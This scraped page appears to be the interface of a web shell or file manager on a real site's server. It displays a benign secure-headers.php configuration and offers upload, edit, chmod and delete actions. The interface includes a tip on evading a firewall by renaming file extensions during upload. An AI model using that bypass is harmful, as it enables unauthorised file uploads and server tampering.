Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
invoice-sync.bitkit.dk
httpdocs
config
File Content:
secure-headers.php
<?php return [ /* * Server * * Reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Server * * Note: when server is empty string, it will not add to response header */ 'server' => '', /* * X-Content-Type-Options * * Reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options * * Available Value: 'nosniff' */ 'x-content-type-options' => 'nosniff', /* * X-Download-Options * * Reference: https://msdn.microsoft.com/en-us/library/jj542450(v=vs.85).aspx * * Available Value: 'noopen' */ 'x-download-options' => 'noopen', /* * X-Frame-Options * * Reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options * * Available Value: 'deny', 'sameorigin', 'allow-from <uri>' */ 'x-frame-options' => 'sameorigin', /* * X-Permitted-Cross-Domain-Policies * * Reference: https://www.adobe.com/devnet/adobe-media-server/articles/cross-domain-xml-for-streaming.html * * Available Value: 'all', 'none', 'master-only', 'by-content-type', 'by-ftp-filename' */ 'x-permitted-cross-domain-policies' => 'none', /* * X-Power-By * * Note: it will not add to response header if the value is empty string. */ 'x-power-by' => '', /* * X-XSS-Protection * * Reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-XSS-Protection * * Available Value: '1', '0', '1; mode=block' */ 'x-xss-protection' => '1; mode=block', /* * Referrer-Policy * * Reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy * * Available Value: 'no-referrer', 'no-referrer-when-downgrade', 'origin', 'origin-when-cross-origin', * 'same-origin', 'strict-origin', 'strict-origin-when-cross-origin', 'unsafe-url' */ 'referrer-policy' => 'no-referrer', /* * Clear-Site-Data * * Reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Clear-Site-Data */ 'clear-site-data' => [ 'enable' => false, 'all' => false, 'cache' => true, 'cookies' => true, 'storage' => true, 'executionContexts' => true, ], /* * HTTP Strict Transport Security * * Reference: https://developer.mozilla.org/en-US/docs/Web/Security/HTTP_strict_transport_security * * Please ensure your website had set up ssl/tls before enable hsts. */ 'hsts' => [ 'enable' => true, 'max-age' => 31536000, 'include-sub-domains' => false, 'preload' => false, ], /* * Expect-CT * * Reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Expect-CT */ 'expect-ct' => [ 'enable' => false, 'max-age' => 2147483648, 'enforce' => false, // report uri must be absolute-URI 'report-uri' => null, ], /* * Feature Policy * * Reference: https://w3c.github.io/webappsec-feature-policy/ */ 'feature-policy' => [ 'enable' => true, /* * Each directive details can be found on: * * https://github.com/w3c/webappsec-feature-policy/blob/master/features.md * * 'none', '*' and 'self allow' are mutually exclusive, * the priority is 'none' > '*' > 'self allow'. */ // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/accelerometer 'accelerometer' => [ 'self' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/ambient-light-sensor 'ambient-light-sensor' => [ 'self' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/autoplay 'autoplay' => [ 'self' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/battery 'battery' => [ 'self' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/camera 'camera' => [ 'self' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/display-capture 'display-capture' => [ 'self' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/document-domain 'document-domain' => [ '*' => true, ], // document-write (draft: https://github.com/w3c/webappsec-feature-policy/blob/master/policies/document-write.md) // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/encrypted-media 'encrypted-media' => [ 'self' => true, ], // https://wicg.github.io/page-lifecycle/#feature-policies 'execution-while-not-rendered' => [ '*' => true, ], // https://wicg.github.io/page-lifecycle/#feature-policies 'execution-while-out-of-viewport' => [ '*' => true, ], // focus-without-user-activation (draft: https://github.com/w3c/webappsec-feature-policy/blob/master/policies/focus-without-user-activation.md) // font-display-late-swap (draft: https://github.com/w3c/webappsec-feature-policy/blob/master/policies/font-display-late-swap.md) // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/fullscreen 'fullscreen' => [ 'self' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/geolocation 'geolocation' => [ 'self' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/gyroscope 'gyroscope' => [ 'self' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/layout-animations 'layout-animations' => [ 'self' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/legacy-image-formats 'legacy-image-formats' => [ 'self' => true, ], // loading-frame-default-eager (draft: https://github.com/w3c/webappsec-feature-policy/blob/master/policies/loading-frame-default-eager.md) // loading-image-default-eager (draft: https://github.com/w3c/webappsec-feature-policy/blob/master/policies/loading-image-default-eager.md) // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/magnetometer 'magnetometer' => [ 'self' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/microphone 'microphone' => [ 'self' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/midi 'midi' => [ 'self' => true, ], // https://drafts.csswg.org/css-nav-1/#policy-feature 'navigation-override' => [ 'self' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/oversized-images 'oversized-images' => [ '*' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/payment 'payment' => [ 'self' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/picture-in-picture 'picture-in-picture' => [ '*' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/publickey-credentials 'publickey-credentials' => [ 'self' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/sync-xhr 'sync-xhr' => [ '*' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/unoptimized-images 'unoptimized-images' => [ 'self' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/unsized-media 'unsized-media' => [ '*' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/usb 'usb' => [ 'self' => true, ], // vertical-scroll (draft: https://github.com/w3c/webappsec-feature-policy/blob/master/policies/vertical_scroll.md) // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/wake-lock 'wake-lock' => [ 'self' => true, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy/xr-spatial-tracking 'xr-spatial-tracking' => [ 'self' => true, ], ], /* * Content Security Policy * * Reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP */ 'csp' => [ 'enable' => true, // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only 'report-only' => false, // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/report-to 'report-to' => '', // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/report-uri 'report-uri' => [ // uri ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/block-all-mixed-content 'block-all-mixed-content' => false, // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/upgrade-insecure-requests 'upgrade-insecure-requests' => false, // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/base-uri 'base-uri' => [ 'self' ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/child-src 'child-src' => [ // ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/connect-src 'connect-src' => [ // ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/default-src 'default-src' => [ 'self' ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/font-src 'font-src' => [ // ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/form-action 'form-action' => [ // ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors 'frame-ancestors' => [ // ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-src 'frame-src' => [ // ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/img-src 'img-src' => [ // ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/manifest-src 'manifest-src' => [ // ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/media-src 'media-src' => [ // ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/navigate-to 'navigate-to' => [ 'unsafe-allow-redirects' => false, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/object-src 'object-src' => [ // ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/plugin-types 'plugin-types' => [ // 'application/pdf', ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/prefetch-src 'prefetch-src' => [ // ], // https://w3c.github.io/webappsec-trusted-types/dist/spec/#integration-with-content-security-policy 'require-trusted-types-for' => [ 'script' => false, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox 'sandbox' => [ 'enable' => false, 'allow-downloads-without-user-activation' => false, 'allow-forms' => false, 'allow-modals' => false, 'allow-orientation-lock' => false, 'allow-pointer-lock' => false, 'allow-popups' => false, 'allow-popups-to-escape-sandbox' => false, 'allow-presentation' => false, 'allow-same-origin' => false, 'allow-scripts' => false, 'allow-storage-access-by-user-activation' => false, 'allow-top-navigation' => false, 'allow-top-navigation-by-user-activation' => false, ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src 'script-src' => [ 'none' => false, 'self' => true, 'report-sample' => false, 'allow' => [ // 'url', ], 'schemes' => [ // 'data:', // 'https:', ], /* followings are only work for `script` and `style` related directives */ 'unsafe-inline' => false, 'unsafe-eval' => false, // https://www.w3.org/TR/CSP3/#unsafe-hashes-usage 'unsafe-hashes' => false, // Enable `strict-dynamic` will *ignore* `self`, `unsafe-inline`, // `allow` and `schemes`. You can find more information from: // https://www.w3.org/TR/CSP3/#strict-dynamic-usage 'strict-dynamic' => false, 'hashes' => [ 'sha256' => [ // 'sha256-hash-value-with-base64-encode', ], 'sha384' => [ // 'sha384-hash-value-with-base64-encode', ], 'sha512' => [ // 'sha512-hash-value-with-base64-encode', ], ], ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src-attr 'script-src-attr' => [ // ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src-elem 'script-src-elem' => [ // ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/style-src 'style-src' => [ // ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/style-src-attr 'style-src-attr' => [ // ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/style-src-elem 'style-src-elem' => [ // ], // https://w3c.github.io/webappsec-trusted-types/dist/spec/#trusted-types-csp-directive 'trusted-types' => [ 'enable' => false, 'allow-duplicates' => false, 'default' => false, 'policies' => [ // ], ], // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/worker-src 'worker-src' => [ // ], ], ];
Edit
Download
Unzip
Chmod
Delete
